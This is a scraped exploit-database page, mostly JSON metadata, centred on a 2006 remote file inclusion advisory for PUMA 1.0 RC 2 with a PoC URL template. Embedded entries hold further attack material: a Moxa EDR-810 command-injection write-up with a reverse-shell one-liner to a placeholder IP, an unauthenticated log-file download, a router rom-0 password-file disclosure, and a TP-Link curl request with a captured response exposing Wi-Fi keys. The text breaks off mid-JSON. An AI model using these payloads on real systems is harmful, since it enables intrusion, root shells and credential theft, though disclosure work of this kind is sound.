Search...

PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability

2006-09-10T00:00:00

ID 1337DAY-ID-810
Type zdt
Reporter Philipp Niedziela
Modified 2006-09-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
PUMA &lt;= 1.0 RC 2 (config.php) Remote File Include Vulnerability
===============================================================



+--------------------------------------------------------------------
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PUMA 1.0 RC 2
+ Venedor ...........: http://php.psywerx.net/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+
+--------------------------------------------------------------------
+
+ Affected File:
+ /config.php
+
+ Code:
+ .....
+ // Select language
+ $lang = "lang_english.php";
+ include($fpath."./language/$lang");
+ .....
+
+--------------------------------------------------------------------
+
+ $fpath is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+  -&gt; Declare $fpath!
+  -&gt; Deny direct access to config.php
+  -&gt; or modify code:
+
+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&
!isset($_POST['fpath'])){
+ //code of org. config.php
+ }
+ else {
+ echo "You cannot access this file directly.";
+ die();
+ }
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/config.php?fpath=[script]
+
+
+-------------------------[ E O F ]----------------------------------



#  0day.today [2018-01-02]  #

JSON Vulners Source

Initial Source

{"hash": "3fad2c51a5b3e3760c196b8d118dc3267738a074b536caeb76bfb3dd7ad3040c", "id": "1337DAY-ID-810", "lastseen": "2018-01-02T09:16:10", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "493c75c2e2042c46e3209de5118c6257", "key": "href"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "modified"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "26c62c096c6171182870a67e22db5394", "key": "reporter"}, {"hash": "a4f207d32f3ad469091abc24ae9485ce", "key": "sourceData"}, {"hash": "a62ba200e34051f0012a9fe9274b04ac", "key": "sourceHref"}, {"hash": "91971c66e3b750ed4b161c562a30d822", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2018-01-02T09:16:10"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31953", "1337DAY-ID-30759", "1337DAY-ID-29207"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2017-0245.NASL", "VIRTUOZZO_VZLSA-2017-0935.NASL", "VIRTUOZZO_VZLSA-2017-0527.NASL", "EULEROS_SA-2017-1081.NASL", "EULEROS_SA-2017-1082.NASL", "CENTOS_RHSA-2017-0935.NASL", "REDHAT-RHSA-2017-0935.NASL", "ORACLELINUX_ELSA-2017-0935.NASL", "SL_20170412_TOMCAT_ON_SL7_X.NASL"]}, {"type": "seebug", "idList": ["SSV:97231", "SSV:96997"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29"]}, {"type": "talos", "idList": ["TALOS-2017-0472"]}, {"type": "cve", "idList": ["CVE-2015-1862"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9021"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882690"]}, {"type": "centos", "idList": ["CESA-2017:0935"]}], "modified": "2018-01-02T09:16:10"}, "vulnersScore": 5.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "45d795a92d0f78833543abfb63b228c345444d39e133421d1ba988cbebdf4601", "id": "1337DAY-ID-810", "lastseen": "2016-04-19T23:50:14", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-19T23:50:14"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3d3c905a099f5447524f85595a7b5b65", "key": "sourceData"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "modified"}, {"hash": "26c62c096c6171182870a67e22db5394", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "45ec6c125d686003653f49229c473465", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "229c757ab285c181e82f096e9899c882", "key": "href"}, {"hash": "91971c66e3b750ed4b161c562a30d822", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "c9b73e92d50d483e55fce73da7fb643c", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/810", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "http://0day.today/exploit/description/810"}, "lastseen": "2016-04-19T23:50:14", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nPUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability\r\n===============================================================\r\n\r\n\r\n\r\n+--------------------------------------------------------------------\r\n+\r\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: PUMA 1.0 RC 2\r\n+ Venedor ...........: http://php.psywerx.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected File:\r\n+ /config.php\r\n+\r\n+ Code:\r\n+ .....\r\n+ // Select language\r\n+ $lang = \"lang_english.php\";\r\n+ include($fpath.\"./language/$lang\");\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $fpath is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ -> Declare $fpath!\r\n+ -> Deny direct access to config.php\r\n+ -> or modify code:\r\n+\r\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\r\n!isset($_POST['fpath'])){\r\n+ //code of org. config.php\r\n+ }\r\n+ else {\r\n+ echo \"You cannot access this file directly.\";\r\n+ die();\r\n+ }\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+\r\n+ http://[target]/config.php?fpath=[script]\r\n+\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-09-10T00:00:00", "references": [], "reporter": "Philipp Niedziela", "modified": "2006-09-10T00:00:00", "href": "https://0day.today/exploit/description/810"}

{"zdt": [{"lastseen": "2019-12-04T02:02:32", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2019-10-22T00:00:00", "published": "2019-10-22T00:00:00", "id": "1337DAY-ID-33402", "href": "https://0day.today/exploit/description/33402", "title": "Moxa EDR-810 - Command Injection / Information Disclosure Vulnerabilities", "type": "zdt", "sourceData": "During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. \r\n\r\nAs usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to \u00e2\u20ac\u0153responsible disclose\u00e2\u20ac\u009d them. \r\n\r\nThe ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. \r\n\r\nMany thanks to Moxa and ICS-CERT teams for their help.\r\n\r\n\r\n\r\nAdvisory\r\n\r\nThe following two product vulnerabilities were identified in Moxa\u00e2\u20ac\u2122s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:\r\n\r\nCVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.\r\nCVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.\r\n\r\n\r\nExploitation\r\n\r\nCVE-2019-10969 - Ping Command Injection\r\n\r\nThe Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: \r\n\r\nPing command injection\r\n\r\nDue to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:\r\nbash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1\r\n\r\n\r\nCVE-2019-10963 - Missing Access Control On Log Files\r\n\r\nWhen a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:\r\n\r\nhttp://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz\r\nAn attacker can retrieve this archive without being authenticated on the Web interface as shown below:\r\n\r\n# wget http://192.168.0.1/MOXA_All_LOG.tar.gz\r\n--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz\r\nConnexion \u00c3 192.168.0.1:80... connect\u00c3\u00a9.\r\nrequ\u00c3\u00aate HTTP transmise, en attente de la r\u00c3\u00a9ponse... 200 OK\r\nTaille : 15724 (15K) [text/plain]\r\nSauvegarde en : \" MOXA_All_LOG.tar.gz \"\r\n\r\nMOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s \r\n\r\n2019-02-13 17:35:19 (152 MB/s) - \" MOXA_All_LOG.tar.gz \" sauvegard\u00c3\u00a9 [15724/15724]\r\n\r\n# tar ztvf MOXA_All_LOG.tar.gz \r\ndrwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/\r\n-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini\r\n-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini\r\n-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini\r\n\r\n\r\nMitigation\r\n\r\nIt is recommended to install at least the firmware version 5.3 from Moxa website.\r\n\r\n\r\n\r\nTimeline\r\n\r\n2019-02-24: Vendor Disclosure\r\n2019-02-24: Advisory sent to ICS-CERT\r\n2019-09-30: Advisory published by Moxa\r\n2019-10-01: Advisory published by ICS-CERT\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33402"}, {"lastseen": "2019-02-07T13:16:52", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-01-14T00:00:00", "published": "2019-01-14T00:00:00", "id": "1337DAY-ID-31953", "href": "https://0day.today/exploit/description/31953", "title": "Across DR-810 ROM-0 - Backup File Disclosure Vulnerability", "type": "zdt", "sourceData": "#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)\r\n#Exploit Author: SajjadBnd\r\n#My Email: [email\u00a0protected]\r\n#Vendor Homepage: http://www.ac.i8i.ir/\r\n#Version: DR-810\r\n#Tested on: DR-810\r\n#RomPager/4.07 UPnP/1.0\r\n\r\n[+] About\r\n==========\r\nthis hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card\r\ni8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote: \r\n\r\nSIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.\r\nIn this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.\r\n\r\n[+] Rom-0 Backup File Disclosure\r\n=================================\r\nA dangerous vulnerability present on many network devices which are using\r\nRomPager.The rom-0 file contains sensitive information such as the router password.\r\nThere is a disclosure in which anyone can download that file without any authentication by\r\na simple GET request.\r\n\r\n[+] POC\r\n========\r\njust add /rom-0 to your target address\r\nrom-0 Backup File will be downloaded\r\n\r\nhttp://target/rom-0\r\n\r\nthen you can Decompressed the file and get password\n\n# 0day.today [2019-02-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31953"}, {"lastseen": "2018-07-24T02:13:58", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-23T00:00:00", "published": "2018-07-23T00:00:00", "id": "1337DAY-ID-30759", "href": "https://0day.today/exploit/description/30759", "title": "TP-Link Archer C2 v3.0 UnAuthenticated Remote Code Execution Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: [UnAuthenticated Remote Code Execution at TP-Link Archer C2 Router]\r\n# Date: [17.07.2018] \r\n# Exploit Author: [Ismail Tasdelen]\r\n# Vendor Homepage: [https://www.tp-link.com/]\r\n# Hardware Link : [https://www.tp-link.com/la/products/details/cat-9_Archer-C2.html]\r\n# Hardware Version : [Archer C2 v3.0]\r\n# Firmware Version : [3.0.0 Build 20160713 Rel. 74035(EU)]\r\n# Vulernability Type : [RCE - Remote Code Execution]\r\n# Vulenrability : [UnAuthenticated Remote Code Execution]\r\n# Risk : [High]\r\n\r\n# Description : What is remote code execution vulnerability ?\r\n\r\nVulnerabilities can provide an attacker with the ability to execute malicious code and take complete control of an affected system with the privileges of the user running the application. Remote code execution can be best described as an action which involves an attacker executing code remotely using system vulnerabilities. Such code can run from a remote server, which means that the attack can originate from anywhere around the world giving the attacker access to the PC. Once a hacker gains access to a system, they\u2019ll be able to make changes within the target computer.The attacker leverages the user\u2019s admin privileges to allow them to execute code and make further changes to the computer. It\u2019s often the case that such user privileges become elevated. Attackers usually look to gain further control on the system they already have a grip on and look to exert control onto other computers on the same network.\r\n\r\n# POC:\r\n\r\n# cURL Request :\r\n\r\ncurl 'http://198.168.0.1:8081/cgi-bin/luci/;stok=78c53e5bb36166c34245a44bd99edd59/admin/ledgeneral?form=setting' -H 'Host: 198.168.0.1:8081' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://198.168.0.1:8081/webpages/index.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: sysauth=50e6c4175557343bb0aac91fa2e0ce7f' -H 'Connection: keep-alive' --data 'operation=write'\r\n\r\n# HTTP Request :\r\n\r\nPOST /cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting HTTP/1.1\r\nHost: 198.168.0.1:8081\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://198.168.0.1:8081/webpages/index.html\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 15\r\nCookie: sysauth=e3638eb1f1952c2a56bd50f466603048\r\nConnection: keep-alive\r\n\r\n# HTTP Response :\r\n\r\nHTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: application/json\r\nCache-Control: no-cache\r\nExpires: 0\r\n\r\nJSON Data :\r\n\r\n{\r\n \"log\": {\r\n \"version\": \"1.1\",\r\n \"creator\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"browser\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"pages\": [\r\n {\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"id\": \"page_1\",\r\n \"title\": \"Wireless Router Archer C2\",\r\n \"pageTimings\": {\r\n \"onContentLoad\": -1,\r\n \"onLoad\": -1\r\n }\r\n }\r\n ],\r\n \"entries\": [\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"time\": 930,\r\n \"request\": {\r\n \"bodySize\": 15,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"15\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"setting\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=write\"\r\n },\r\n \"headersSize\": 577\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 79,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"enable\\\":\\\"off\\\",\\\"time_set\\\":\\\"yes\\\",\\\"ledpm_support\\\":\\\"yes\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 79\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 0,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 922,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.652+03:00\",\r\n \"time\": 987,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"w